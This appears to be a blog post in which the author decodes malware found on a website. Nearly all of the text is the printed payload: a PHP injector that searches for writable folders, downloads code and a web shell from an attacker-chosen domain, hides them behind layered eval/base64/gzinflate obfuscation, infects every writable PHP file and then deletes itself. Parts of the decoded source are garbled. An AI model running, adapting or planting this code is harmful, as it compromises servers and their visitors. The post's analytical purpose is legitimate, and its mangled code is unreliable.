9Pf9uDwVMbnruYA3H3PsRbDEtGYo0Nh06t6vhu62/lxCHZsCQoVAbIskb3wt1+E3VuofdFd/jjf2XqWH6QIqx2NEqCFmBdTwRl+d0LZdxNNdFUgI6QxnHAQkmNUeovcYPvKVqPo3D25h6QBsQxvxhHwhpPxxAxQE6O9SrgO8BOhcXrIv2JDHqi1Haxgm0dn8lYnZecbSXe5S5Ipdozbm6tvb9FWTBFd7SmG6OjrK/3skVImKbOU4U/uJb+QcONWEBx8EXr5D+5MBtt90FftF/+qxMHuWfbUqdwmn/LvPRVB1/OSUq9zqglDcndA2GdpSf8S2Zf3iRw1ZxlHf3P5UE9vR6ffhZnpHlEY95+HBFNLBb6sa7DSgi2L6mVMlNc2o+2wkpThO8r9/WYBnN9Ch/CIYEFJxJjBVyS/BjmQf+WzkfP5F/NlirGj0cUhVgQhCnYIuNxIvpX3VIo2yOH00EI/YSl4LqXbIHBU5JQi0kiszINVNb9RFC0s/JHd0Niir3rqjvgQtwEB7J8WrzfPwLrdH57Y7F/xX7sd70X3cUP1XUiDZPIjvgpdFhxVvspZNghwjcOsqvZnHOzEMsuNgQ/mPtnzF/XolWVOUCxd5xRI+fku8m/7sxivinSRsDwneqnvJIlg/b5eS3+gW46vhKNTU7Z8tvuxyIGi49bGVdtiyDj6awW1ttx60byLkinhkxaqTa03JZ2kUY5uXHPffd5EQhc1NImj6Z4SQQGtmFB0rvlRWunuYX6rCvQsYTnL8wvs67cEODIj+ixv7e1SpzlmOJI7+ypEojJZkg+3yz6WxjEJhdKG1PcaSjwQIf9YUHf7SXJNwdK9AzPyaUQsTarCfz+CfevvuIYpz7dSXPxnebjwEahOi0Q2P23KEJNgzZF2E1+jSvWDv0jI+CVAi8yX8K9yX8ztQNUS+D1u6aDoJqf7gp5hu/ITph/4WWQbM3jaF5LvaqYeloCot7hJ/CxcatW3+kJowvGIWVs40hPp5AVu50aR+YxL1L0DHm79kIE6d2NvRFvSbj//96HTu0nnoohVcF7lhQJmFlDy8dS8CBmOI4FxqxXhhfrJ00pTYBgotECqitF070K/yrrVj6KJ0f6D9ZAX/MjA21K0nfy3tz2XLnLBttQ4BHkzCTYWcqQNjMrX072n61s2vA4TACKHeBAjKDWp02ltZgxdLO/kXl+i0Ye5AaT04w/+1A5/4b3b/iB+Bv+Yy1SJe0H/HbcmiIoeBP4GHIFF85bar0lIU4SN2fDaJYGMPdh6zKNEooRU5Emn6IZdVnDfI/xVYPKdddIuOxmuKK57vTJh1YYlTFxKFmHzU1DhcnuzXxdHqiUTKrebiq8r1do6QMTQZyoy/6Ftyuyv9A9uOwPhKeOOx6QvzfguCGeMPKjkhWa2dHRjxeGkR2xm2AMDqwxeWdsT6DOGcJQc58cWP0pVJBM0swN/U3GTkC0ujb5RGHhg/rrYjVDL/whFpchXeH7xGm5l4mV2ChTwWg83KlHIhi+IyjF5FbcjdcgBpMDCm99RK2gTbWLZEb3fw4SxqLVteXxG1Cqth8tlo4kxxGzEL/S9p8r4WjFX3yD6/6J/8hSM70X8hSQLt8MCA3NqbKV+MG2I0mv5eL54w+a2nm4BJ5fPcxVZx+AsuvlHJQssNNetK6GrBtn1qJFXUfgPbHshKKw+TJHWBtoYtBsPYmadZxdtYbs52LuQUX4HQRuHWS+LsB/tT3sM93se3oW+fXp7uW0aZul2JDxcEQfu6QBBAQYr/n//+97//+/8=')));

At first I thought the decode hadn’t worked as the start of the strings were identical, of course that is a rookie mistake and I should have just diff’d them anyway. Turns out that it is doubly encoded to be annoying. Running it through the decode again brings us a bit more sanity:

full path [{$_SERVER['SCRIPT_FILENAME']}]
[s1]
";
echo "{$GLOBALS['dg_iver']}

{$GLOBALS['http']}{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}

";
$path = explode("/", $_SERVER['SCRIPT_FILENAME']);
array_pop($path);
$uri = explode("/", $_SERVER['REQUEST_URI']);
$uri = array_slice($uri, 0, count($uri) - 1);
while (count($uri) > 0 && count($path) > 0 && strtolower($uri[count($uri) - 1]) == strtolower($path[count($path) - 1])) {
unset($uri[count($uri) - 1]);
unset($path[count($path) - 1]);
}
$GLOBALS['dgsp'] = implode("/", $path);
$GLOBALS['fpath'] = $GLOBALS['dgsp'];
echo "root dir path [{$GLOBALS['dgsp']}/]

";
$GLOBALS['dgcgr'] = 0;
$GLOBALS['dgcgrf'] = 0;
dg_main_exec();
}
}
if (!function_exists('all_php_inject')) {
function all_php_inject($folder, $inj = 0, $silent = true) {
$our_folder = 0;
$folder = str_replace('\', ' / ', $folder); if($folder[strlen($folder) - 1] == ' / '){ $folder = substr($folder, 0, strlen($folder) - 1); } if(!is_dir($folder)){ if(!$silent){echo"NOT FOLDER {$folder}
";} return; } if(is_link($folder)){ if(!$silent){echo"LINK {$folder}
";} return; } if(strpos(strtolower($folder), 'cache') || strpos(strtolower($folder), 'snapshot')){ if(!$silent){echo"CACHE {$folder}
";} return; } if($folder . "/" == $GLOBALS['dgcp'] || file_exists($folder . ' / ' . $GLOBALS['dgin'])){ if(!$silent){echo"MAIN DIR {$folder}
";} return; } if(!$silent){echo"{$folder}
";} $h = opendir($folder); if(!$h){ if(!$silent){echo"OPENDIR {$folder}
";} return; } if(check_engine_rules($folder)){ process_file_inject($GLOBALS['dg_wpi'][count($GLOBALS['dg_wpi']) - 1], 1, 0); } $dirs = array(); while(strlen($f = readdir($h))){ if($f == ' . ' || $f == ' . . '){ continue; } $pc = 0; $lp = ""; $file = $folder . ' / ' . $f; if(is_file($file)){ if(in_array($file, $GLOBALS['dg_wpi'])){ if(!$silent){echo"BUSY {$file}
";} continue; } $mfn = substr(md5($folder . ' / '), 0, 3) . ' . php'; $sfn = substr(md5($mfn), 0, 4) . ' . php'; $mkr = md5($file); if($f == $mfn){ if(!$silent){echo"OTHER MS {$file}
";} continue; } if($f == $sfn){ if(!$silent){echo"SHELL {$file}
";} continue; } if(isset($GLOBALS['dgmn']) && $f == $GLOBALS['dgmn']){ continue; } if(!in_array(strtolower(gfe($file)), array("php","phtml","php3","php4","php5"))){ continue; } if(!is_writable($file)){ if(!$silent){echo"{$file}
";} continue; } process_file_inject($file, $inj, $silent); }elseif(is_dir($file)){ $dirs[$file] = count($dirs) + 1; } } closedir($h); foreach($dirs as $key=>$val){ all_php_inject($key, $inj, $silent); } } } if(!function_exists('clear_get_post_vars')){ function clear_get_post_vars($var){ $var = rawurldecode($var); if(get_magic_quotes_gpc() || strpos($var,'\"')){ $var = stripslashes($var); } if(strpos($var, '"')){ $var = html_entity_decode($var); } return $var; } } if(!function_exists('process_file_inject')){ function process_file_inject($file, $inj, $silent){ $lc = " < b > [notpatched] < / b > "; $lp = ""; $mkr = md5($file); $fa = file($file); $oc = implode("", $fa); $nc = $oc; /*dg_clear_exploits($nc);*/ while(preg_match(" / {
$GLOBALS['dgix']
} / si", $nc, $_r)){ if(preg_match('/md5\s+\=\s+\"(\w{32})\"/si', $_r[0], $_m)){ if($_m[1] == '00000000000000000000000000000000'){ echo " < b > BOMB < / b > < fontcolor = 'blue' > {
$file
} < / font > < br / > "; }elseif($_m[1] == $mkr){ $lc = " < b > [cleared] < / b > "; }elseif($_m[1] <> $mkr){ $lc = " < b > [otherscript] < / b > "; } } $nc = trim(str_replace($_r[0], $_r[1], $nc)); } $nc = trim(preg_replace(" / \ < \ ? php\s * \ ? \ > / s", "", $nc)); if(preg_match(" / \@zend / i", $nc)){ echo " < b > ZEND < / b > < fontcolor = 'red' > {
$file
} < / font > {
$lc
} < br / > "; }elseif($inj){ $inject = prepare_pack($GLOBALS['dgij'], rand(20, 50), 0, 1); if(in_array($file, $GLOBALS['dg_wpi'])){ $tmp = preg_split('/\}\s*[
]+\s*function/siU', $nc); if(count($tmp) > 1){ $inject = hide_eval($inject, 0, $mkr); $middle = round(count($tmp) / 2); $nc = ''; $dgi = 0; foreach($tmp as $key=>$val){ $dgi++; if($dgi == count($tmp)){ $nc = $nc.$val; }else{ if($dgi == $middle){ $nc = $nc.$val."
} {
$inject
}
function "; }else{ $nc = $nc.$val."
}
function "; } } } }else{ $tmp = preg_split('/\*\/\s*[
]+\s*function/siU', $nc); if(count($tmp) > 1){ $inject = hide_eval($inject, 0, $mkr); $middle = round(count($tmp) / 2); $nc = ''; $dgi = 0; foreach($tmp as $key=>$val){ $dgi++; if($dgi == count($tmp)){ $nc = $nc.$val; }else{ if($dgi == $middle){ $nc = $nc.$val." * / {
$inject
}
function "; }else{ $nc = $nc.$val." * /function "; } } } }else{ $inject = hide_eval($inject, 1, $mkr); $nc = $inject . "" . trim($nc); } } }else{ $inject = hide_eval($inject, 1, $mkr); $nc = $inject . "" . trim($nc); } $lp = " < b > [patched] < / b > "; } if($oc <> $nc){ if(save_text_to_file($file, $nc, 1)){ echo " < fontcolor = 'green' > {
$file
} {
$lc
} {
$lp
} < / font > < br / > "; }else{ echo " < fontcolor = 'red' > {
$file
} {
$lc
} {
$lp
} < / font > < br / > "; } } } } if(!function_exists('leave_clear_php')){ function leave_clear_php(&$txt){ $txt = substr($txt, strpos($txt, '') + 2); } } if(!function_exists('check_engine_install')){ function check_engine_install(){ global $_POST; if(!isset($_POST['dgrules']) || trim($_POST['dgrules']) == ""){ return; } $_POST['dgrules'] = trim(clear_get_post_vars($_POST['dgrules'])); $GLOBALS['dgrules'] = explode(";
", $_POST['dgrules']); $tmp = explode(" / ", $GLOBALS['dgcp']); while(count($tmp) > 0){ $path = implode(" / ", $tmp); if(check_engine_rules($path)){ break; } unset($tmp[count($tmp) - 1]); } } } if(!function_exists('check_engine_rules')){ function check_engine_rules($path){ foreach($GLOBALS['dgrules'] as $key=>$val){ $val = trim($val); $search_path = explode("@ #@", $val); $all_found = 1; foreach($search_path as $key2=>$val2){ $val2 = trim($val2); if(in_array($path . $val2, $GLOBALS['dg_wpi'])){ return 0; } if(!(file_exists($path . $val2))){ $all_found = 0; break; } } if($all_found){ foreach($search_path as $key2=>$val2){ if(is_writable($path . $val2)){ $GLOBALS['dg_wpi'][] = $path . $val2; echo "engine path {$path}{$val2}
"; return 1; } } return 0; } } return 0; } } if(!function_exists('dgdownload')){ function dgdownload($url, $connect_timeout){ if(!$url){return '';} $ret = ''; $url_info = parse_url($url); if(!isset($url_info['port']) || !$url_info['port']){ $url_info['port'] = 80; } if(!isset($url_info['path']) || !$url_info['path']){ $url_info['path'] = '/'; } if(isset($url_info['query']) && $url_info['query']){ $url_info['path'] = $url_info['path'] . "?" . $url_info['query']; } $query = "GET {$url_info['path']} HTTP/1.0
"; $query .= "Host : {
$url_info['host']
}
"; $query .= "Accept : * /*
"; $query .= "Connection: close
"; $query .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12
"; $query = $query . "
"; $errno = 0; $error = ""; $sock = fsockopen($url_info['host'], $url_info['port'], $errno, $error, $connect_timeout); $h = array(); $resp = array(); if($sock){ stream_set_timeout($sock, $connect_timeout); fwrite($sock, $query); $hd = false; while(!feof($sock)){ $l = fgets($sock); if(!$hd){ if(trim($l) == ''){ $hd = true; }else{ $h[] = $l; } }else{ $resp[] = $l; } } fclose($sock); } $ret = implode("", $resp); return $ret; } } if(!function_exists('save_text_to_file')){ function save_text_to_file($fn, $t, $r = 0){ if($r){ $f = fopen($fn, "w"); }else{ $f = fopen($fn, "a"); } if($f){ fwrite($f, $t); fflush($f); fclose($f); $fs = filesize($fn); if(($t <> '' && $fs) || ($t == '' && !$fs)){ return 1; }else{ $fn = str_replace("/", "\", $fn); $fs = filesize($fn); } if(($t <> '' && $fs) || ($t == '' && !$fs)){ return 1; } }else{ return 0; } } } if(!function_exists('replace_substring')){ function replace_substring(&$text, $pret, $postt, $str){ $pos = strpos($text, $pret); if(!$pos){return false;} $pre = substr($text, 0, $pos + strlen($pret)); $pos = strpos($text, $postt, $pos); if(!$pos){return false;} $post = substr($text, $pos, strlen($text)); if(strlen($pre) && strlen($post)){ $text = $pre.$str.$post; return true; } return false; } } if(!function_exists('gfe')){ function gfe($fn){ $ret = pathinfo($fn); if(isset($ret['extension'])){ return $ret['extension']; }else{ return ""; } } } if(!function_exists('prepare_pack')){ function prepare_pack($php, $cycles = 0, $split_by_functions = 0, $zip = 0){ $ret = preg_replace("/^[^\s]+[\s]/U", "", $php); $ret = preg_replace("/[\s][^\s]+\Z/", "", $ret); $ret = trim($ret); if($split_by_functions){ $tmp = preg_split('/\}\s+function/', $ret); }else{ $tmp[] = $ret; } $skip_first = false; if(count($tmp)){ if($split_by_functions && strpos($tmp[0], 'function') === 0){ $tmp[0] = substr($tmp[0], strlen('function'), strlen($tmp[0])); }else{ $skip_first = true; } $ret = ''; $count = 0; $total = count($tmp); foreach($tmp as $key=>$val){ $val = preg_replace("/\s+/", " ", $val); $count++; $count == $total ? $add = '' : $add = '}'; if($total > 1 && !($count == 1 && $skip_first)){ $next_encoded = '/*' . generate_string(50) . '*/
' . 'function ' . trim($val) . $add; }else{ $next_encoded = trim($val).$add; } if($zip && function_exists('gzdeflate')){ $next_encoded = gzdeflate($next_encoded, 9); } $next_encoded = base64_encode($next_encoded); if($zip && function_exists('gzdeflate')){ $ret .= "eval(gzinflate(base64_decode(' {
$next_encoded
}
')));"; }else{ $ret .= "eval(base64_decode(' {
$next_encoded
}
'));"; } } for($i = 0; $i < $cycles; $i++){ if($zip && function_exists('gzdeflate')){ $ret = gzdeflate($ret, 9); } $ret = base64_encode($ret); if($zip && function_exists('gzdeflate')){ $ret = "eval(gzinflate(base64_decode(' { $ret } ')));"; }else{ $ret = "eval(base64_decode(' { $ret } '));"; } } } return $ret; } } if(!function_exists('hide_eval')){ function hide_eval($encoded_gzipped_code, $add_php_sign = 0, $marker = ""){ $ret = ""; $replacement = "eval(gzinflate(base64_decode('"; $pos = strpos($encoded_gzipped_code, $replacement); if(!($pos === false)){ $encoded_gzipped_code = substr($encoded_gzipped_code, $pos + strlen($replacement), strlen($encoded_gzipped_code)); } $replacement = "')));"; $pos = strpos($encoded_gzipped_code, $replacement); if(!($pos === false)){ $encoded_gzipped_code = substr($encoded_gzipped_code, 0, $pos); } $l = array("e","v","a","l","g","z","i","n","f","t","b","s","6","4","_","d","c","r","o","(",")",";","$"); shuffle($l); $l = array_flip($l); $a = "("; foreach($l as $k=>$val){ rand(0, 100) < 50 ? $sep = "'" : $sep = '"'; $a .= "{$sep}{$k}{$sep},"; } $a = substr($a, 0, strlen($a) - 1) . ");"; if($marker){ $ret .= "\$"."md5 = \"{$marker}\"; "; } $ret .= "\${$GLOBALS['dgeha']} = array{$a} "; $ret .= "\${$GLOBALS['dgehf']} = create_function('\$'.'v',\${$GLOBALS['dgeha']}[{$l['e']}].\${$GLOBALS['dgeha']}[{$l['v']}].\${$GLOBALS['dgeha']}[{$l['a']}].\${$GLOBALS['dgeha']}[{$l['l']}].\${$GLOBALS['dgeha']}[{$l['(']}].\${$GLOBALS['dgeha']}[{$l['g']}].\${$GLOBALS['dgeha']}[{$l['z']}].\${$GLOBALS['dgeha']}[{$l['i']}].\${$GLOBALS['dgeha']}[{$l['n']}].\${$GLOBALS['dgeha']}[{$l['f']}].\${$GLOBALS['dgeha']}[{$l['l']}].\${$GLOBALS['dgeha']}[{$l['a']}].\${$GLOBALS['dgeha']}[{$l['t']}].\${$GLOBALS['dgeha']}[{$l['e']}].\${$GLOBALS['dgeha']}[{$l['(']}].\${$GLOBALS['dgeha']}[{$l['b']}].\${$GLOBALS['dgeha']}[{$l['a']}].\${$GLOBALS['dgeha']}[{$l['s']}].\${$GLOBALS['dgeha']}[{$l['e']}].\${$GLOBALS['dgeha']}[{$l['6']}].\${$GLOBALS['dgeha']}[{$l['4']}].\${$GLOBALS['dgeha']}[{$l['_']}].\${$GLOBALS['dgeha']}[{$l['d']}].\${$GLOBALS['dgeha']}[{$l['e']}].\${$GLOBALS['dgeha']}[{$l['c']}].\${$GLOBALS['dgeha']}[{$l['o']}].\${$GLOBALS['dgeha']}[{$l['d']}].\${$GLOBALS['dgeha']}[{$l['e']}].\${$GLOBALS['dgeha']}[{$l['(']}].\${$GLOBALS['dgeha']}[{$l['$']}].\${$GLOBALS['dgeha']}[{$l['v']}].\${$GLOBALS['dgeha']}[{$l[') ']}].\${$GLOBALS['dgeha']}[{$l[') ']}].\${$GLOBALS['dgeha']}[{$l[') ']}].\${$GLOBALS['dgeha']}[{$l['; ']}]); "; $ret .= "\${$GLOBALS['dgehf']}(' { $encoded_gzipped_code } '); "; $ret = trim($ret); if($add_php_sign){ $ret = "<"."?php " . $ret . " ?".">"; } return $ret; } } if(!function_exists('generate_string')){ function generate_string($len = 4){ $ret = ''; $arr = array('q','w','e','r','t','y','u','i','o','p','a','s','d','f','g','h','j','k','l','z','x','c','v','b','n','m'); for($i = 0; $i < $len; $i++){ $ret .= $arr[rand(0, count($arr) - 1)]; } return $ret; } } if(!function_exists('search_writable_dirs')){ function search_writable_dirs($folder, &$madrs, &$flag){ if($flag){ return; } $folder = str_replace('\', ' / ', $folder); if(count($madrs) > 300){ return; } if(isset($GLOBALS['dgbc'][$folder . "
"])){ echo"CHECKED {$folder}
"; return; } if(!file_exists($folder)){ echo"NOT EXISTS {$folder}
"; return; } if(strpos(strtolower($folder), 'cache') || strpos(strtolower($folder), 'snapshot')){ echo"CACHE {$folder}
"; return; } $h = opendir($folder); if(!$h){ return; } if(is_writable($folder)){ $fn = substr(md5($folder . ' / '), 0, 3) . ' . php'; if(file_exists($folder . ' / ' . $fn) || file_exists($folder . ' / cnf')){ echo"OLD SCRIPT {$folder}/{$fn}
[m1]
"; $madrs = array(); $madrs[$folder] = count($madrs) + 1; $flag = 1; return; } $madrs[$folder] = count($madrs) + 1; } while(($f = readdir($h)) !== FALSE){ if($f == ' . ' || $f == ' . . ' || $f == ' / ' || $f == '\'){ continue; } if($folder == ' / '){ $folder = ''; } if(is_dir($folder . ' / ' . $f)){ if(is_link($folder . ' / ' . $f)){ continue; } if(strpos($folder . ' / ' . $f . ' / ', $GLOBALS['dgsp']) === false){ echo"SKIP: {$folder}/{$f}
"; continue; } search_writable_dirs($folder . ' / ' . $f, $madrs, $flag); } } closedir($h); flush(); } } if(!function_exists('dg_main_exec')){ function dg_main_exec(){ global $_SERVER; echo"



"; flush(); $ddrs = array(); $a = false; $GLOBALS['dgcp'] = ''; echo"

LOOKING FOR THE LONGEST PATH AT {$GLOBALS['dgsp']}

"; search_writable_dirs($GLOBALS['dgsp'], $ddrs, $a); echo"";flush(); $max = 0; foreach($ddrs as $key=>$val){ $fldr = explode(' / ', $key); $c = count($fldr); if($max < $c){ $max = $c; $GLOBALS['dgcp'] = implode(' / ', $fldr); } } if(!$GLOBALS['dgcp']){ echo"nowhere to write anything
[e4]"; die; } if($GLOBALS['dgsp'] == $GLOBALS['dgcp']){ echo"can'twritetothedocumentroot < / b > < br / > [e5]"; die; } $GLOBALS['dgcp'] = str_replace('\', '/', $GLOBALS['dgcp']); $GLOBALS['dgcp'] .= '/'; $GLOBALS['dgsp'] .= '/'; echo"thelongestavailablepath: < b > {
$GLOBALS['dgcp']
} < / b > < br / > "; $GLOBALS['dgin'] = substr(md5($GLOBALS['dgcp']), 0, 3) . '.php'; $GLOBALS['dgeha'] = "a" . substr(md5($GLOBALS['dgin']), 0, 1); $GLOBALS['dgehf'] = "b" . substr(md5($GLOBALS['dgin']), 0, 2); $GLOBALS['dgij'] = "if (function_exists('ob_start') && !isset(\$GLOBALS['mfsn'])) {\$GLOBALS['mfsn'] = '{$GLOBALS['dgcp']}{$GLOBALS['dgin']}';
if (file_exists(\$GLOBALS['mfsn'])) {include_once (\$GLOBALS['mfsn']);
if (function_exists('gml') && function_exists('dgobh')) {ob_start('dgobh');
}}}"; flush(); $pms = dgdownload($GLOBALS['dg_pu'], 60); if($pms){ echo" < bcolor = 'green' > [size:
" . strlen($pms) . "] < / b > < br / > [s2] < br / > "; leave_clear_php($pms); }else{ die(" < bcolor = 'red' > downloadfailed < / b > < br / > [e2] < br / > "); } if(!replace_substring($pms, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){ die(" < bcolor = 'red' > failedtosetpath < / b > < br / > [e6]"); } echo" < bcolor = 'green' > path[{$GLOBALS['dgcp']}] < / b > < br / > "; if(!replace_substring($pms, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){ die(" < bcolor = 'red' > failedtosetname < / b > < br / > [e7]"); } if(!replace_substring($pms, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){ die(" < bcolor = 'red' > failedtosetrelativerootdir < / b > < br / > [e8]"); } echo" < bcolor = 'green' > relativerootdir[{$GLOBALS['dgsp']}] < / b > < br / > "; $packed_js = prepare_pack($pms, rand(5, 10), 1, 1); $packed_js = hide_eval($packed_js, 1); if(save_text_to_file($GLOBALS['dgcp'] . $GLOBALS['dgin'], $packed_js, 1)){ echo" < bcolor = 'green' > [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}] < / b > < br / > [s4] < br / > "; }else{ echo" < bcolor = 'red' > [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}] < / b > < br / > [e9] < br / > "; die; } $GLOBALS['dgsf'] = substr(md5($GLOBALS['dgin']), 0, 4) . '.php'; flush(); $shl = dgdownload($GLOBALS['dg_eu'], 60); if($shl){ echo" < bcolor = 'green' > ss[size:
" . strlen($shl) . "] < / b > < br / > [s3] < br / > "; leave_clear_php($shl); }else{ echo" < bcolor = 'red' > downloadfailed < / b > < br / > [e3] < br / > "; } $shl = preg_replace(" / ^[^\s] + [\s] / U", "", $shl); $shl = preg_replace(" / [\s][^\s] + \Z / ", "", $shl); $shl = '/*' . generate_string(200) . '*/ ' . $shl . ' /*' . generate_string(200) . '*/ '; $packed_js = prepare_pack($shl, rand(50, 100), 0, 1); $packed_js = hide_eval($packed_js, 1); if(save_text_to_file($GLOBALS['dgcp'] . $GLOBALS['dgsf'], $packed_js, 1)){ echo" < bstyle: = 'color:green' > [{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}] < / b > < br / > [s5] < br / > "; }else{ echo" < bcolor = 'red' > [{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}] < / b > < br / > "; } echo" < small > "; echo" < h3 > INJECTINGPHPFILES < / h3 > "; check_engine_install(); if(count($GLOBALS['dg_wpi']) > 0){ process_file_inject($GLOBALS['dg_wpi'][0], 1, 0); all_php_inject($GLOBALS['dgsp'], 0, 0); }else{ all_php_inject($GLOBALS['dgsp'], 1, 0); } if($_SERVER['SCRIPT_FILENAME'] <> $GLOBALS['dgcp'] . $GLOBALS['dgmn']){ if(copy($_SERVER['SCRIPT_FILENAME'], $GLOBALS['dgcp'] . $GLOBALS['dgmn'])){ echo"File{$_SERVER['SCRIPT_FILENAME']}copied"; }else{ echo"Failedtocopyfile{$_SERVER['SCRIPT_FILENAME']}"; } unlink($_SERVER['SCRIPT_FILENAME']); }else{ echo"Noneedtocopyfile{$_SERVER['SCRIPT_FILENAME']}"; } echo" < / small > < hr / > < b > dgok < / b > < / div > "; } } if(!isset($GLOBALS['dgbaw'])){ $GLOBALS['dgbaw'] = 1; if(isset($_GET['dgphpinfo'])){phpinfo();die;} set_time_limit(1800); ignore_user_abort(true); $GLOBALS['dg_wpi'] = array(); $GLOBALS['dgrules'] = array(); $GLOBALS['dg_iver'] = "4.0"; $GLOBALS['http'] = 'http:/'.'/'; $GLOBALS['dgmn'] = "class -image . php"; $GLOBALS['dgfn'] = ""; $GLOBALS['dg_id'] = ""; $GLOBALS['dgix'] = '\$'.'md5\s\=\s\"\w{32}\"\;\s*\$[^\s]+\s\=\s[^\s]+\;\s*\$[^\s]+\s\=\screate\_function[^\s]+\;\s*\$[^\s]+\s*(\S)'; if(isset($_GET['dgd']) || isset($_POST['dgd'])){ error_reporting(E_ALL); }else{ error_reporting(0); } if($GLOBALS['dgmn'] && (!strpos($_SERVER['SCRIPT_FILENAME'], $GLOBALS['dgmn'])) || !file_exists($_SERVER['SCRIPT_FILENAME'])){ if(file_exists($_SERVER['PATH_TRANSLATED'])){ $_SERVER['SCRIPT_FILENAME'] = $_SERVER['PATH_TRANSLATED']; }else{ echo" < bcolor = 'red' > can't detect full path [{$_SERVER['SCRIPT_FILENAME']}]

[e1]"; die; } } if(!$GLOBALS['dg_id'] && isset($_GET['dgdomain']) && $_GET['dgdomain']){ $GLOBALS['dg_id'] = $_GET['dgdomain']; } if(!$GLOBALS['dg_id'] && isset($_POST['dgdomain']) && $_POST['dgdomain']){ $GLOBALS['dg_id'] = $_POST['dgdomain']; } if((isset($_GET['dginit']) || isset($_POST['dginit']))){ if(!$GLOBALS['dg_id']){ die("[e13]"); } $GLOBALS['dg_pu'] = "{$GLOBALS['http']}{$GLOBALS['dg_id']}/?update=js&host={$_SERVER['HTTP_HOST']}"; $GLOBALS['dg_eu'] = "{$GLOBALS['http']}{$GLOBALS['dg_id']}/?update=shl&host={$_SERVER['HTTP_HOST']}"; $_SERVER['SCRIPT_FILENAME'] = str_replace('\', ' / ', $_SERVER['SCRIPT_FILENAME']); $_SERVER['SCRIPT_FILENAME'] = preg_replace("/\/+/", "/", $_SERVER['SCRIPT_FILENAME']); die(dg_main_init()); }else{ die(""); } }

Cool, so we’re getting somewhere. I’ll expand this post when I’ve had chance to look at it some more!
Incidentally, it’s when I got to this point that I started to think people may be right and that I might be a geek…

Useful links:
Decoding
PHP formatting tidy
Raw paste (Twice? Or injected twice…)



Newer Post: Jazz Hooves!
Older Post: Beefing up security

Advertisement